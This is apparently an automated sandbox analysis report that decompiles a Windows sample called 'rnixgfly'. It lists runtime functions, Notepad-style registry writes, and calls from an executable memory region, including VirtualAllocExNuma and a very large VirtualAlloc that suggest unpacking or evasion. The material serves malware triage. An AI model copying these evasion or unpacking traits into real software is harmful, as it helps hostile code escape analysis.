                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 484 40c55d-40c567 485 40c584-40c58d 484->485 486 40c569-40c573 484->486 488 40c590-40c595 485->488 489 40c58f 485->489 486->485 487 40c575-40c583 call 40370a 486->487 491 40c597-40c5a8 RtlAllocateHeap 488->491 492 40c5aa-40c5b1 488->492 489->488 491->492 494 40c5dc-40c5de 491->494 495 40c5b3-40c5bc call 40b343 492->495 496 40c5cf-40c5d4 492->496 495->488 500 40c5be-40c5c3 495->500 496->494 497 40c5d6 496->497 497->494 501 40c5c5 500->501 502 40c5cb-40c5cd 500->502 501->502 502->494
                      C-Code - Quality: 86%
                      			E0040C55D(signed int _a4, signed int _a8, long _a12) {
                      				void* _t10;
                      				long _t11;
                      				long _t12;
                      				signed int _t13;
                      				signed int _t17;
                      				long _t19;
                      				long _t24;
                      
                      				_t17 = _a4;
                      				if(_t17 == 0) {
                      					L3:
                      					_t24 = _t17 * _a8;
                      					__eflags = _t24;
                      					if(_t24 == 0) {
                      						_t24 = _t24 + 1;
                      						__eflags = _t24;
                      					}
                      					goto L5;
                      					L6:
                      					_t10 = RtlAllocateHeap( *0x415a64, 8, _t24); // executed
                      					__eflags = 0;
                      					if(0 == 0) {
                      						goto L7;
                      					}
                      					L14:
                      					return _t10;
                      					goto L15;
                      					L7:
                      					__eflags =  *0x415f58;
                      					if( *0x415f58 == 0) {
                      						_t19 = _a12;
                      						__eflags = _t19;
                      						if(_t19 != 0) {
                      							 *_t19 = 0xc;
                      						}
                      					} else {
                      						_t11 = E0040B343(_t10, _t24);
                      						__eflags = _t11;
                      						if(_t11 != 0) {
                      							L5:
                      							_t10 = 0;
                      							__eflags = _t24 - 0xffffffe0;
                      							if(_t24 > 0xffffffe0) {
                      								goto L7;
                      							} else {
                      								goto L6;
                      							}
                      						} else {
                      							_t12 = _a12;
                      							__eflags = _t12;
                      							if(_t12 != 0) {
                      								 *_t12 = 0xc;
                      							}
                      							_t10 = 0;
                      						}
                      					}
                      					goto L14;
                      				} else {
                      					_t13 = 0xffffffe0;
                      					_t27 = _t13 / _t17 - _a8;
                      					if(_t13 / _t17 >= _a8) {
                      						goto L3;
                      					} else {
                      						 *((intOrPtr*)(E0040370A(_t27))) = 0xc;
                      						return 0;
                      					}
                      				}
                      				L15:
                      			}










                      0x0040c562
                      0x0040c567
                      0x0040c584
                      0x0040c589
                      0x0040c58b
                      0x0040c58d
                      0x0040c58f
                      0x0040c58f
                      0x0040c58f
                      0x00000000
                      0x0040c597
                      0x0040c5a0
                      0x0040c5a6
                      0x0040c5a8
                      0x00000000
                      0x00000000
                      0x0040c5dc
                      0x0040c5de
                      0x00000000
                      0x0040c5aa
                      0x0040c5aa
                      0x0040c5b1
                      0x0040c5cf
                      0x0040c5d2
                      0x0040c5d4
                      0x0040c5d6
                      0x0040c5d6
                      0x0040c5b3
                      0x0040c5b4
                      0x0040c5ba
                      0x0040c5bc
                      0x0040c590
                      0x0040c590
                      0x0040c592
                      0x0040c595
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040c5be
                      0x0040c5be
                      0x0040c5c1
                      0x0040c5c3
                      0x0040c5c5
                      0x0040c5c5
                      0x0040c5cb
                      0x0040c5cb
                      0x0040c5bc
                      0x00000000
                      0x0040c569
                      0x0040c56d
                      0x0040c570
                      0x0040c573
                      0x00000000
                      0x0040c575
                      0x0040c57a
                      0x0040c583
                      0x0040c583
                      0x0040c573
                      0x00000000

                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,004029D6,00000000,?,00408C55,00000000,004029D6,00000000,00000000,00000000,?,0040725B,00000001,00000214,?,004033DA), ref: 0040C5A0
                        • Part of subcall function 0040370A: __getptd_noexit.LIBCMT ref: 0040370A
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: AllocateHeap__getptd_noexit
                      • String ID:
                      • API String ID: 328603210-0
                      • Opcode ID: c35acac04d4de571c3b900101eba404759f094f7bb0d36237bb97e882affdf1c
                      • Instruction ID: 3453bd4832c175796419321ec01136e88b743f7a930f2e637f01305e36202e16
                      • Opcode Fuzzy Hash: c35acac04d4de571c3b900101eba404759f094f7bb0d36237bb97e882affdf1c
                      • Instruction Fuzzy Hash: 88019239201225EEEB249F65DC94BA73795AB85360F108B3AE815AB2D0DB38E901C658
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00480EBF: GetSystemInfo.KERNELBASE(?), ref: 00480EDC
                      • VirtualAllocExNuma.KERNELBASE(00000000), ref: 00480F82
                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID: AllocInfoNumaSystemVirtual
                      • String ID:
                      • API String ID: 449148690-0
                      • Opcode ID: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                      • Instruction ID: 0e86de2588e11a1b15a8184666640b049d590f591f7b243c56cd6dfd8b8fec84
                      • Opcode Fuzzy Hash: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                      • Instruction Fuzzy Hash: CFF0F470D64309BAEBB07BF2580776D76689F01309F108D5AB744762C3DABD9608476D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 536 40318f-4031a5 call 4030d1
                      C-Code - Quality: 25%
                      			E0040318F(intOrPtr _a4, intOrPtr _a8) {
                      				void* __ebp;
                      				void* _t3;
                      				void* _t4;
                      				void* _t5;
                      				void* _t6;
                      				void* _t9;
                      
                      				_push(0x40);
                      				_push(_a8);
                      				_push(_a4);
                      				_t3 = E004030D1(_t4, _t5, _t6, _t9); // executed
                      				return _t3;
                      			}









                      0x00403194
                      0x00403196
                      0x00403199
                      0x0040319c
                      0x004031a5

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: __wfsopen
                      • String ID:
                      • API String ID: 197181222-0
                      • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                      • Instruction ID: 2ced2bfb3f9d4ac77b3096636764d60d89a48be8f4a51fc1c3532829defdef63
                      • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                      • Instruction Fuzzy Hash: 26C0927254020C77DF112E83EC02E4A3F5E9BC0774F448021FB1C291A5AA77EAA19689
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • RtlEncodePointer.NTDLL(00000000,0040B4CB,00415220,00000314,00000000,?,?,?,?,?,00406B3A,00415220,Microsoft Visual C++ Runtime Library,00012010), ref: 004070FB
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: EncodePointer
                      • String ID:
                      • API String ID: 2118026453-0
                      • Opcode ID: 4880c20d65b4e0c8c680dfcee244b8a26e30051ea0af9c1fdfdc0c01e56bd82f
                      • Instruction ID: 45c9fe6625449defc2d77b84375a10b8a7ee1ea61be3005a2c3dbae11cbcc7d8
                      • Opcode Fuzzy Hash: 4880c20d65b4e0c8c680dfcee244b8a26e30051ea0af9c1fdfdc0c01e56bd82f
                      • Instruction Fuzzy Hash:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00480E5C
                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                      • Instruction ID: bcd0f4e5bf464c75245518bed374840f1af04c07023b6741f5c7002380603ca9
                      • Opcode Fuzzy Hash: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                      • Instruction Fuzzy Hash: A0113A70D10208EFDB40EBA8DC4ABAEBBB4AB05304F208896E550B7251D3754A44CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 85%
                      			E0040800D(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                      				intOrPtr _v0;
                      				void* _v804;
                      				intOrPtr _v808;
                      				intOrPtr _v812;
                      				intOrPtr _t6;
                      				intOrPtr _t11;
                      				intOrPtr _t12;
                      				intOrPtr _t13;
                      				long _t17;
                      				intOrPtr _t21;
                      				intOrPtr _t22;
                      				intOrPtr _t25;
                      				intOrPtr _t26;
                      				intOrPtr _t27;
                      				intOrPtr* _t31;
                      				void* _t34;
                      
                      				_t27 = __esi;
                      				_t26 = __edi;
                      				_t25 = __edx;
                      				_t22 = __ecx;
                      				_t21 = __ebx;
                      				_t6 = __eax;
                      				_t34 = _t22 -  *0x414570; // 0x9760b8e
                      				if(_t34 == 0) {
                      					asm("repe ret");
                      				}
                      				 *0x415d28 = _t6;
                      				 *0x415d24 = _t22;
                      				 *0x415d20 = _t25;
                      				 *0x415d1c = _t21;
                      				 *0x415d18 = _t27;
                      				 *0x415d14 = _t26;
                      				 *0x415d40 = ss;
                      				 *0x415d34 = cs;
                      				 *0x415d10 = ds;
                      				 *0x415d0c = es;
                      				 *0x415d08 = fs;
                      				 *0x415d04 = gs;
                      				asm("pushfd");
                      				_pop( *0x415d38);
                      				 *0x415d2c =  *_t31;
                      				 *0x415d30 = _v0;
                      				 *0x415d3c =  &_a4;
                      				 *0x415c78 = 0x10001;
                      				_t11 =  *0x415d30; // 0x0
                      				 *0x415c2c = _t11;
                      				 *0x415c20 = 0xc0000409;
                      				 *0x415c24 = 1;
                      				_t12 =  *0x414570; // 0x9760b8e
                      				_v812 = _t12;
                      				_t13 =  *0x414574; // 0xf689f471
                      				_v808 = _t13;
                      				 *0x415c70 = IsDebuggerPresent();
                      				_push(1);
                      				E00408005(_t14);
                      				SetUnhandledExceptionFilter(0);
                      				_t17 = UnhandledExceptionFilter(" \\A");
                      				if( *0x415c70 == 0) {
                      					_push(1);
                      					E00408005(_t17);
                      				}
                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                      			}



















                      0x0040800d
                      0x0040800d
                      0x0040800d
                      0x0040800d
                      0x0040800d
                      0x0040800d
                      0x0040800d
                      0x00408013
                      0x00408015
                      0x00408015
                      0x0040b896
                      0x0040b89b
                      0x0040b8a1
                      0x0040b8a7
                      0x0040b8ad
                      0x0040b8b3
                      0x0040b8b9
                      0x0040b8c0
                      0x0040b8c7
                      0x0040b8ce
                      0x0040b8d5
                      0x0040b8dc
                      0x0040b8e3
                      0x0040b8e4
                      0x0040b8ed
                      0x0040b8f5
                      0x0040b8fd
                      0x0040b908
                      0x0040b912
                      0x0040b917
                      0x0040b91c
                      0x0040b926
                      0x0040b930
                      0x0040b935
                      0x0040b93b
                      0x0040b940
                      0x0040b94c
                      0x0040b951
                      0x0040b953
                      0x0040b95b
                      0x0040b966
                      0x0040b973
                      0x0040b975
                      0x0040b977
                      0x0040b97c
                      0x0040b990

                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 0040B946
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040B95B
                      • UnhandledExceptionFilter.KERNEL32( \A), ref: 0040B966
                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040B982
                      • TerminateProcess.KERNEL32(00000000), ref: 0040B989
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                      • String ID: \A
                      • API String ID: 2579439406-3503946924
                      • Opcode ID: 6a3e57fa7c72d397f773aac9d32601290c33fa956e244bc9e11b990348b6f039
                      • Instruction ID: 85da8a808e4b98403950fcee6e72ddd3236f317be0e167dc40347674819b260b
                      • Opcode Fuzzy Hash: 6a3e57fa7c72d397f773aac9d32601290c33fa956e244bc9e11b990348b6f039
                      • Instruction Fuzzy Hash: 5B219EB8811B04EBD740DF65FD896C43BB4BB88315F50C53AE9099A260EBB959818F8D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004066DE() {
                      
                      				SetUnhandledExceptionFilter(E0040669C);
                      				return 0;
                      			}



                      0x004066e3
                      0x004066eb

                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000669C), ref: 004066E3
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: bded30a880d91434e9ea7b6cf477416163f9988ffaad514a95d85cac01b9da64
                      • Instruction ID: 84f951258dbbba53fa59dbd9b439672c707fbbd9d41bbe323b106ac1153b7929
                      • Opcode Fuzzy Hash: bded30a880d91434e9ea7b6cf477416163f9988ffaad514a95d85cac01b9da64
                      • Instruction Fuzzy Hash: 5B9002A425114456C6101B715D1954965946A49712B528871A442DC094DABB50509A29
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                      • Instruction ID: 2766dd5a029832b7d37e3fb9707a1deac6e2cbf9e2181f6b93dfe521557bb84f
                      • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                      • Instruction Fuzzy Hash: CF11C236620119AFC7A0FF69C8849AEB7E9EF147A47048416FC54CB310E339ED85C758
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                      • Instruction ID: 52925d0b358a7acd3f541616a416249af7f279ebcd0f59705efdf9c39566a97c
                      • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                      • Instruction Fuzzy Hash: 5EE09A35264148EFCB80DBA8CC85D29B3F8EB09330B144691F825C73A0E739EE00DB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                      • Instruction ID: 8591dccd857a49fd4573a6170e8979aa6d8bf850ad78c6707efc41181d889be7
                      • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                      • Instruction Fuzzy Hash: DBE048322206149BC7A1AB59C844D5BF7E8EF44770B454826ED4597611C335FC05C794
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.248668647.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_480000_rnixgfly.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                      • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                      • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                      • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E004011CB(signed int __edx) {
                      				void* _v8;
                      				char _v12;
                      				char _v16;
                      				int _v20;
                      				void* _v36;
                      				struct _WINDOWPLACEMENT _v64;
                      				long _t78;
                      				char _t81;
                      				char _t84;
                      				char _t87;
                      				intOrPtr _t90;
                      				intOrPtr _t94;
                      				char _t104;
                      				char _t110;
                      				char _t128;
                      				char _t143;
                      				int _t146;
                      				signed int _t147;
                      				signed int _t164;
                      				int _t167;
                      
                      				_t164 = __edx;
                      				_t78 = RegCreateKeyExW(0x80000001, L"Software\\Microsoft\\Notepad", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v20);
                      				if(_t78 == 0) {
                      					_v64.length = 0x2c;
                      					GetWindowPlacement( *0x415f64,  &_v64);
                      					_t81 =  *0x415fdc; // 0x0
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					_t167 = 4;
                      					_v12 = _t81;
                      					RegSetValueExW(_v8, L"fWrap", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_t84 =  *0x4151c4; // 0x0
                      					_v12 = _t84;
                      					RegSetValueExW(_v8, L"iWindowPosX", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_t87 =  *0x4151c8; // 0x0
                      					_v12 = _t87;
                      					RegSetValueExW(_v8, L"iWindowPosY", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_t90 =  *0x4151cc; // 0x0
                      					_v12 = _t90 -  *0x4151c4;
                      					RegSetValueExW(_v8, L"iWindowPosDX", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_t94 =  *0x4151d0; // 0x0
                      					_v12 = _t94 -  *0x4151c8;
                      					RegSetValueExW(_v8, L"iWindowPosDY", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x415f97 & 0x000000ff;
                      					RegSetValueExW(_v8, L"lfCharSet", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x415f99 & 0x000000ff;
                      					RegSetValueExW(_v8, L"lfClipPrecision", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_t104 =  *0x415f88; // 0x0
                      					_v12 = _t104;
                      					RegSetValueExW(_v8, L"lfEscapement", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x415f94 & 0x000000ff;
                      					RegSetValueExW(_v8, L"lfItalic", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_t110 =  *0x415f8c; // 0x0
                      					_v12 = _t110;
                      					RegSetValueExW(_v8, L"lfOrientation", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x415f98 & 0x000000ff;
                      					RegSetValueExW(_v8, L"lfOutPrecision", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x415f9b & 0x000000ff;
                      					RegSetValueExW(_v8, L"lfPitchAndFamily", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x415f9a & 0x000000ff;
                      					RegSetValueExW(_v8, L"lfQuality", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x415f96 & 0x000000ff;
                      					RegSetValueExW(_v8, L"lfStrikeOut", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x415f95 & 0x000000ff;
                      					RegSetValueExW(_v8, L"lfUnderline", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_t128 =  *0x415f90; // 0x0
                      					_v12 = _t128;
                      					RegSetValueExW(_v8, L"lfWeight", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x416cd0;
                      					RegSetValueExW(_v8, L"iMarginTop", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x416cd4;
                      					RegSetValueExW(_v8, L"iMarginBottom", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x416cd8;
                      					RegSetValueExW(_v8, L"iMarginLeft", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_v12 =  *0x416cdc;
                      					RegSetValueExW(_v8, L"iMarginRight", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_t143 =  *0x415f78; // 0x0
                      					_v12 = _t143;
                      					RegSetValueExW(_v8, L"bStatusBar", 0, 0x4151c4,  &_v12, 0x4151c4);
                      					_t146 = E00401051();
                      					_t147 =  *0x415f80; // 0x0
                      					asm("cdq");
                      					_v16 = MulDiv((_t147 ^ _t164) - _t164, 0x2d0, _t146);
                      					RegSetValueExW(_v8, L"iPointSize", 0, _t167,  &_v16, 0x4151c4);
                      					RegSetValueExW(_v8, L"lfFaceName", 0, 1, 0x415f9c, lstrlenW(0x415f9c) + _t153);
                      					RegSetValueExW(_v8, L"szHeader", 0, 1, 0x416ce0, lstrlenW(0x416ce0) + _t156);
                      					RegSetValueExW(_v8, L"szTrailer", 0, 1, 0x416ee8, lstrlenW(0x416ee8) + _t159);
                      					return RegCloseKey(_v8);
                      				}
                      				return _t78;
                      			}























                      0x004011cb
                      0x004011ef
                      0x004011f7
                      0x00401209
                      0x00401210
                      0x00401216
                      0x00401223
                      0x00401224
                      0x00401225
                      0x00401228
                      0x0040122f
                      0x00401231
                      0x00401242
                      0x00401244
                      0x0040124a
                      0x0040125b
                      0x0040125d
                      0x00401263
                      0x00401274
                      0x00401276
                      0x00401282
                      0x00401293
                      0x00401295
                      0x004012a1
                      0x004012b2
                      0x004012bc
                      0x004012cd
                      0x004012d6
                      0x004012e8
                      0x004012ea
                      0x004012f0
                      0x00401301
                      0x0040130b
                      0x0040131c
                      0x0040131e
                      0x00401324
                      0x00401335
                      0x0040133f
                      0x00401350
                      0x0040135a
                      0x0040136b
                      0x00401375
                      0x00401386
                      0x00401390
                      0x004013a1
                      0x004013aa
                      0x004013bc
                      0x004013be
                      0x004013c4
                      0x004013d5
                      0x004013dd
                      0x004013ee
                      0x004013f6
                      0x00401407
                      0x0040140f
                      0x00401420
                      0x00401428
                      0x00401439
                      0x0040143b
                      0x00401441
                      0x00401452
                      0x00401454
                      0x0040145a
                      0x0040145f
                      0x00401471
                      0x00401482
                      0x004014a4
                      0x004014c0
                      0x004014dc
                      0x00000000
                      0x004014e8
                      0x004014eb

                      APIs
                      • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004011EF
                      • GetWindowPlacement.USER32(?), ref: 00401210
                      • RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00401242
                      • RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0040125B
                      • RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 00401274
                      • RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00401293
                      • RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 004012B2
                      • RegSetValueExW.ADVAPI32(?,lfCharSet,00000000,00000004,?,00000004), ref: 004012CD
                      • RegSetValueExW.ADVAPI32(?,lfClipPrecision,00000000,00000004,?,00000004), ref: 004012E8
                      • RegSetValueExW.ADVAPI32(?,lfEscapement,00000000,00000004,?,00000004), ref: 00401301
                      • RegSetValueExW.ADVAPI32(?,lfItalic,00000000,00000004,?,00000004), ref: 0040131C
                      • RegSetValueExW.ADVAPI32(?,lfOrientation,00000000,00000004,?,00000004), ref: 00401335
                      • RegSetValueExW.ADVAPI32(?,lfOutPrecision,00000000,00000004,?,00000004), ref: 00401350
                      • RegSetValueExW.ADVAPI32(?,lfPitchAndFamily,00000000,00000004,?,00000004), ref: 0040136B
                      • RegSetValueExW.ADVAPI32(?,lfQuality,00000000,00000004,?,00000004), ref: 00401386
                      • RegSetValueExW.ADVAPI32(?,lfStrikeOut,00000000,00000004,?,00000004), ref: 004013A1
                      • RegSetValueExW.ADVAPI32(?,lfUnderline,00000000,00000004,?,00000004), ref: 004013BC
                      • RegSetValueExW.ADVAPI32(?,lfWeight,00000000,00000004,?,00000004), ref: 004013D5
                      • RegSetValueExW.ADVAPI32(?,iMarginTop,00000000,00000004,?,00000004), ref: 004013EE
                      • RegSetValueExW.ADVAPI32(?,iMarginBottom,00000000,00000004,?,00000004), ref: 00401407
                      • RegSetValueExW.ADVAPI32(?,iMarginLeft,00000000,00000004,?,00000004), ref: 00401420
                      • RegSetValueExW.ADVAPI32(?,iMarginRight,00000000,00000004,?,00000004), ref: 00401439
                      • RegSetValueExW.ADVAPI32(?,bStatusBar,00000000,00000004,?,00000004), ref: 00401452
                        • Part of subcall function 00401051: RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 00401069
                        • Part of subcall function 00401051: RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,?,?,?), ref: 00401090
                        • Part of subcall function 00401051: RegCloseKey.ADVAPI32(?), ref: 004010AB
                      • MulDiv.KERNEL32(00000000,000002D0,00000000), ref: 0040146A
                      • RegSetValueExW.ADVAPI32(?,iPointSize,00000000,00000004,?,00000004), ref: 00401482
                      • lstrlenW.KERNEL32(00415F9C), ref: 0040148F
                      • RegSetValueExW.ADVAPI32(?,lfFaceName,00000000,00000001,00415F9C,00000000), ref: 004014A4
                      • lstrlenW.KERNEL32(00416CE0), ref: 004014AB
                      • RegSetValueExW.ADVAPI32(?,szHeader,00000000,00000001,00416CE0,00000000), ref: 004014C0
                      • lstrlenW.KERNEL32(00416EE8), ref: 004014C7
                      • RegSetValueExW.ADVAPI32(?,szTrailer,00000000,00000001,00416EE8,00000000), ref: 004014DC
                      • RegCloseKey.ADVAPI32(?), ref: 004014E1
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: Value$lstrlen$Close$CreateOpenPlacementQueryWindow
